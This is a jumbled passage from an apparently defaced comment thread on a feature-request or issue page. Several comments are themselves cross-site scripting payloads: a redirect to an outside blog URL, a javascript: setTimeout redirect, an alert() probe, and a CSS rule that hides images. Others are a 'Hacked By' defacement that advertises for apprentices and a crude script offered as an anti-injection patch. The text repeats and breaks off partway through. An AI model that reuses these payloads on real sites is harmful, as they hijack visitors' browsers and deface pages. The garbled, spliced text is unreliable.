If it were too difficult to allow as the folder under root,
window.location.href='https://blogs.kainy.cn/?from=feathubXSS2';
setTimeout("javascript:location.href='hello.html'", 0);
how about a new macro/variable that lets us do something like {Movie TitleThe:1} that will use the first letter of the title, or some other customization (and NOT require {Movie Title} as a mandatory field)。。 。
Anti-injection patch
zx775337791 commented almost 2 years ago
Tea img,svg,table{visibility: collapse;}
kevindragong commented almost 2 years ago
are you zhaoxu?
974297362 commented almost 2 years ago
are you zhaoxu?
ntyangyang commented almost 2 years ago
are you zhaoxu?
ww3651425 commented almost 2 years ago
are you zhaoxu?
mirsQian commented almost 2 years ago
are you zhaoxu?
alightman commented almost 2 years ago
are you zhaoxu?
CoatiFly commented almost 2 years ago
are you zhaoxu?
keepzouba commented almost 2 years ago
Isn't this damn well the same as reporting under your real name? Impressive.
sf197 commented almost 2 years ago
sf197 commented almost 2 years ago
alert(/tasd/)
xss67612 commented almost 2 years ago
Hacked By Helen, taking apprentices, QQ925999918
superzmy commented almost 2 years ago
for(var x of document.getElementsByClassName("body")) { if (x.innerHTML.indexOf("script") >= 0) x.innerHTML = ""; }
Anti-injection patch <script> for(var x of document.getElementsByClassName("body")) { if (x.innerHTML.indexOf("script") >= 0) x.innerHTML = ""; } <script>
itongqingbo commented almost 2 years ago
How do you counter injection?
itongqingbo commented almost 2 years ago
my test commit
itongqingbo commented almost 2 years ago
122
itongqingbo commented almost 2 years ago
test repeat sent b
q8195438 commented almost 2 years ago
for (var i=0;i
guotao commented almost 2 years ago
If it were too difficult to allow as the folder under root, window.location.href='https://blogs.kainy.cn/?from=feathubXSS2'; setTimeout("javascript:location.href='hello.html'", 0); how about a new macro/variable that lets us do something like {Movie TitleThe:1} that will use the first letter of the title, or some other customization (and NOT require {Movie Title} as a mandatory field)。。 。
guotao commented almost 2 years ago
If it were too difficult to allow as the folder under root, window.location.href='https://blogs.kainy.cn/?from=feathubXSS2'; setTimeout("javascript:location.href='hello.html'", 0); how about a new macro/variable that lets us do something like {Movie TitleThe:1} that will use the first letter of the title, or some other customization (and NOT require {Movie Title} as a mandatory field)。。 Anti-injection patch